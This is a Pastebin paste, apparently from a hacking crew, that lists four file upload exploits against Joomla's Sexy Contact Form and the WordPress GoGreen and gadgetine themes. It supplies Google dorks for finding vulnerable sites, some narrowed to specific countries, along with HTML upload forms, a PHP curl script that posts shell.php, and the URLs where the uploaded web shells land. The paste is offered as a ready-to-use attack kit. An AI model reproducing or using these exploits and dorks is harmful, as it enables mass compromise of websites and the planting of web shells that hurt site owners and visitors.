Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #1 Exploit name= com_sexycontactform Shell Vuln Upload
- =============================================
- Script CSRF :
- Code:
- <form method="POST" action="http://www.target.com/components/com_sexycontactform/fileupload/index.php"
- enctype="multipart/form-data">
- <input type="file" name="files[]" /><button>Upload</button>
- </form>
- Exploit : components/com_sexycontactform/fileupload/index.php
- http://www.targetcom/components/com_sexycontactform/fileupload/files/shell.php (root/symlink)
- ***************************************************************************
- #2 Exploit name=Joomla Sexy contact form Arbitrary File Upload Vulnerability
- =============================================
- Google Dork:
- "/components/com_sexycontactform/" site:sy (country name like syria=sy,kyfx=ky.)
- "Powered by sexycontact" site:tr(=Turkey,etc etc)
- inurl:"sexy-contact-form" site:gr
- Exploit : components/com_sexycontactform/fileupload/index.php
- Shell Access : http://www.[target].com/components/com_sexycontactform/fileupload/files/shell.php
- **************************************************************************
- #3 Exploit name=WordPress GoGreen File Upload Vulnerability
- =============================================
- Google Dork :
- inurl:"/wp-content/themes/gogreen/"
- Exploit : /wp-content/themes/gogreen/addpress/includes/ap_fileupload.php
- source code :
- Source code:
- <h1>Syrian Tiger(Opodarthoz Haxor crewz) GoGreen WordPress Exploit</h1>
- <br>
- <form enctype="multipart/form-data"
- action="http://www.[target].com/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php" method="post">
- Home Url: <input name="homeurl" type="text" value="http://" />
- </br>
- Template: <input name="template" type="text" value="gogreen">
- </br>
- Dir1: <input name="themeroot" type="text" />
- </br>
- Dir2: <input name="dir" type="text" />
- </br>
- File: <input name="file_upload" type="file" /><br />
- <input type="submit" value="upload" />
- </form>
- Save as "anyname.html"
- Shell Access: http://www.[target].com/wp-content/themes/gogreen/addpress/includes/YourFolderName/YourShell.php (and voila!!!)
- ***************************************************************************
- #4 Exploit name=WordPress gadgetine-theme File Upload Vulnerability
- Google Dork : inurl:"wp-content/themes/gadgetine-theme/"
- Exploit : http://www.[target].com/wp-content/themes/gadgetine-theme/upload-handler.php
- source code(php)
- <?php
- $uploadfile="shell.php";
- $ch = curl_init("http://www.[target].com/wp-content/themes/gadgetine-theme/upload-handler.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('orange_themes'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch); print "$postResult";
- ?>
- Shell Access : http://www.[target].com/wp-content/uploads/2014/10/shell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement